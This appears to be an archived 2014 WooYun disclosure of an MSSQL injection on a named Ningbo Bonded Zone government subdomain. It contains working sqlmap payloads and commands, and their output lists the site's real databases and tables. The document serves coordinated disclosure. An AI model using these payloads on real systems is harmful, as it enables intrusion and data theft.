乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-05: 细节已通知厂商并且等待厂商处理中 2014-06-09: 厂商已经确认,细节仅向厂商公开 2014-06-19: 细节向核心白帽子及相关领域专家公开 2014-06-29: 细节向普通白帽子公开 2014-07-09: 细节向实习白帽子公开 2014-07-23: 细节向公众公开
宁波保税区某分站#Mssql Injection
Mssql Injection地址:
http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1000) AND 4763=4763 AND (2649=2649 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1000) AND 4704=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(102)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (4704=4704) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(99)+CHAR(104)+CHAR(113))) AND (6117=6117 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=1000) UNION ALL SELECT CHAR(113)+CHAR(111)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(116)+CHAR(76)+CHAR(113)+CHAR(115)+CHAR(88)+CHAR(112)+CHAR(88)+CHAR(111)+CHAR(89)+CHAR(101)+CHAR(113)+CHAR(100)+CHAR(99)+CHAR(104)+CHAR(113),NULL,NULL,NULL,NULL-- ---
#1、获取数据库:
sqlmap -u http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 --dbs
available databases [33]: [*] baosuiqu[*] bsqgh[*] cyzx[*] drc_nftz_gov_cn[*] g共青团员教育活动[*] jbook[*] jcms24_2[*] jgjwebdb2005[*] lmnew[*] master[*] model[*] msdb[*] network[*] new_oa[*] nftz_cnhr_db[*] nftz_cy_db[*] nftz_djw_db [*] nftz_floor[*] nftz_gov_cn_en_db[*] nftz_lbw_db[*] nftzhr[*] nftzoa_file[*] Northwind[*] pdmis_v2[*] pubs[*] qy_dfxt[*] tempdb[*] vipchat[*] webmng[*] WebOA_ZXTOP[*] wzyw[*] yq_album
#2、获取表段:
sqlmap -u http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 -D baosuiqu --tables
Database: baosuiqu [18 tables]+----------------+| Images || data_sjzd || dtproperties || elects || infocenter || product || submenu || sysconstraints || syssegments || system_user || user_qx || victory || votes || web_count || web_link || web_wshd_wsdc || web_wshd_wsdc || web_zhaopin |+----------------+
:)
危害等级:中
漏洞Rank:10
确认时间:2014-06-09 23:02
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心处置。
暂无